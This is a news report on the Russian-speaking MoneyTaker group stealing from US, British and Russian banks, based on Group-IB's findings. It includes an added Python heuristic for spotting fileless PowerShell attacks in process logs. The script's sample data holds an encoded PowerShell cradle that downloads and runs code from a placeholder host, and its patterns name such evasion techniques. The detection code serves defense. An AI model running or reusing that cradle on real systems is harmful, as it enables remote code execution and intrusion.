Report: Russian Hackers Target Banks in US, Britain, Russia
Nearly $10 Million Stolen from 20 Institutions in Past 1½ Years
A group of Russian-speaking hackers over the past year-and-a-half has stolen nearly $10 million from banks mostly in the United States, Britain and Russia, the Moscow-based cybersecurity firm Group-IB reported Monday.
Group-IB labeled the group MoneyTaker after the malware used in attacks on at least 20 organizations, including 16 in the U.S. Most of the victims are small community banks, where hackers targeted card processing systems. Group-IB says the take from each successful attack averaged $500,000.
MoneyTaker uses legitimate penetration testing tools, including Metasploit and PowerShell Empire, as well as tools they developed, according to Group-IB. "When attacking, hackers act creatively and wisely: they use one-time infrastructure and carefully erase traces of their activity post-incident," the company said in a statement. Hackers use "'fileless' malware, which only exists in RAM and is removed on rebooting."
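Because malware that lives only in memory leaves no file on disk to scan, defenders have to lean on execution telemetry instead. The following is an added example (not code from the report or from Group-IB) of the kind of heuristic a SOC might run over process-creation events to surface PowerShell launched in the way in-memory tooling typically launches it: an encoded command combined with a hidden window, a suppressed profile, or a decoded script body that evaluates downloaded code. The log format, the sample lines, the event-ID filter and the two-indicator threshold are all assumptions made for this example.

```python
import base64
import re

def _enc(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed sample events in a simplified "<timestamp> <event_id> <user> <command line>"
# layout (an assumption for this example; real Windows 4688 events are XML in EVTX).
SAMPLE_LOGS = [
    "2017-11-20T09:12:01Z 4688 CORP\\jdoe powershell.exe -File C:\\Scripts\\inventory.ps1",
    "2017-11-20T09:15:44Z 4688 CORP\\svc_backup powershell.exe -NoP -W Hidden -Enc "
    + _enc("IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/x')"),
    "2017-11-20T09:20:13Z 4688 CORP\\admin cmd.exe /c whoami",
    "2017-11-20T09:31:07Z 4688 CORP\\ops powershell.exe -EncodedCommand " + _enc("Get-Date"),
    "2017-11-20T09:40:00Z 4104 CORP\\jdoe Write-Host hello",  # script-block event, not process creation
]

# Launch-flag indicators checked against the raw command line.
FLAG_PATTERNS = [
    (re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|en|e)\s+[A-Za-z0-9+/=]{20,}"), "encoded command"),
    (re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"), "profile suppressed"),
]

# Script-body indicators checked against the decoded script (or the raw line if nothing is encoded).
BODY_PATTERNS = [
    (re.compile(r"(?i)\b(?:iex|invoke-expression)\b"), "dynamic code evaluation"),
    (re.compile(r"(?i)downloadstring|downloaddata|invoke-webrequest"), "remote download"),
    (re.compile(r"(?i)frombase64string"), "embedded base64 payload"),
    (re.compile(r"(?i)reflection\.assembly\]::load"), "in-memory assembly load"),
]

_ENC_ARG = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|en|e)\s+([A-Za-z0-9+/=]+)")

def decode_encoded_command(cmdline: str):
    """Return the decoded script behind -EncodedCommand, or None if absent or malformed."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_command_line(cmdline: str):
    """Collect indicator labels for one command line; returns (findings, decoded_script_or_None)."""
    findings = [label for pat, label in FLAG_PATTERNS if pat.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    body = decoded if decoded is not None else cmdline
    findings += [label for pat, label in BODY_PATTERNS if pat.search(body)]
    return findings, decoded

def scan_log(lines, threshold: int = 2):
    """Alert on process-creation (4688) events whose command line trips at least `threshold` indicators."""
    alerts = []
    for line in lines:
        ts, event_id, user, cmd = line.split(" ", 3)
        if event_id != "4688":
            continue
        findings, decoded = score_command_line(cmd)
        if len(findings) >= threshold:
            alerts.append({"time": ts, "user": user, "findings": findings,
                           "decoded": decoded, "command": cmd})
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOGS):
        print(alert["time"], alert["user"], ", ".join(alert["findings"]))
        if alert["decoded"]:
            print("  decoded:", alert["decoded"])
```

The threshold matters: a lone `-EncodedCommand` is common in legitimate automation (the `Get-Date` line above is not alerted), so the heuristic requires a second indicator before raising an alert. The decoded script body is kept in the alert so an analyst can see what would have run in memory, which is the artifact a disk scan after reboot would never recover.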
The analysis says the hackers used SSL certificates generated with the names of well-known brands, such as Bank of America, Federal Reserve Bank, Microsoft and Yahoo. Servers employed to perform initial infections are one-time components that are changed immediately after each successful infection, Group-IB reports.
Hackers Change Course on the Fly
"Members of the group are skilled enough to promptly adjust the tools applied," the Group-IB report says. "In some cases, they made changes to the source code 'on the fly' during the attack."
Group-IB says the first attack attributed to MoneyTaker occurred in May 2016, when hackers pilfered money from a U.S. bank by gaining access to the First Data STAR card processing system. In September 2016, Group-IB says, it tracked several attacks on Russian banks by targeting the automated workstation client of the Russian Central Bank, a Russian interbank fund transfer system similar to SWIFT. In November 2016, Group-IB says attackers deployed new infrastructures to attack U.S. banks. The last activity using those infrastructures ended this past June, Group-IB says, but the company identified a hack on a Russian bank as late as November.
The cybercriminals also stole documentation for OceanSystems' FedLink card processing system, which is used by 200 banks in Latin America and the U.S. "We believe that banks operating on this infrastructure are at risk of being amongst the next targets of MoneyTaker group," Group-IB warns.